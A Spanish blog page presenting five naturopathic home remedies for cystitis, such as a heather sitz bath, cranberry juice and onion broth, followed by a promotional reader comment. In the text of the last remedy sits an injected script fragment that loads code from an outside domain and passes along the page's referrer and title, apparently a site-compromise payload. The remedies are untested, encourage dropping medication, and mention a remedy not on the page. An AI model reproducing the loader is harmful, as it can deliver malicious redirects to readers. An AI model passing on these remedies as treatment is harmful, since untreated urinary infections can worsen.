Salud y belleza » Enfermedades

Diez remedios populares para aliviar la cistitis (II)

1 Comentario

¿Sufres de cistitis? ¿Ya has probado todos los fármacos y nada sucede? Pues vuelve a las fuentes: a continuación la segunda parte del informe con los mejores cinco remedios caseros, surgidos de la naturopatía, para acabar con un mal común.

5) Baño especial: hervir un puñado de brezo en medio litro de agua durante no menos de ocho minutos. Estacionar; colar y verter en un recipiente capazmente ancho como para poder realizar un baño de asiento. Por cierto, tales baños deberán efectuarse por la mañana o antes de acostarse.

4) Un conocido remedio para la cistitis consiste en tomar tres vasos de jugo de arándanos al día: esta comprobado que tal fruta contienen una sustancia que impide a las bacterias fijarse en las paredes de las vías urinarias. Compruébalo.

3) Infusión reparadora: para alcanzarla debemos, ante todo, lavar y trocear algo asi como unos cien gramos de germinado fresco de alfalfa, un cuarto de pimentón verde y un par de ramitas frescas de poleo. Hecho esto, es necesario lavar, pelar, extraer las semillas y partir algunos tomates rojos. Finalmente se  bate todo y se coloca en un vaso de plástico (no vidrio). Beber en ayunas.

2) De los remedios más sencillo y exitosos: preparar un caldo con no menos de tres cebollas en un litro de agua. Beberlo a lo largo del día (funciona, aún mejor, que el remedio número nueve: en estado liquido se potencia el efecto)

1) Leer este artículo (ambas partes). E ir intercambiando cada receta hasta dar con la formula más exitosa representa, sin dudas, el mejor remedio casero.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • Manuel Herrera said:

    Hola buenos días!

    Primero que todo quiero deciros que me encanta vuestro blog, estuve leyendo y estoy muy interesado en contactar con vosotros. Me parece que la información es muy interesante y actual. Tenéis algún mail de contacto directo? Os dejo mi mail, moseofree@gmail.com espero poder conversar con vosotros. Un saludo,

    Manuel.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.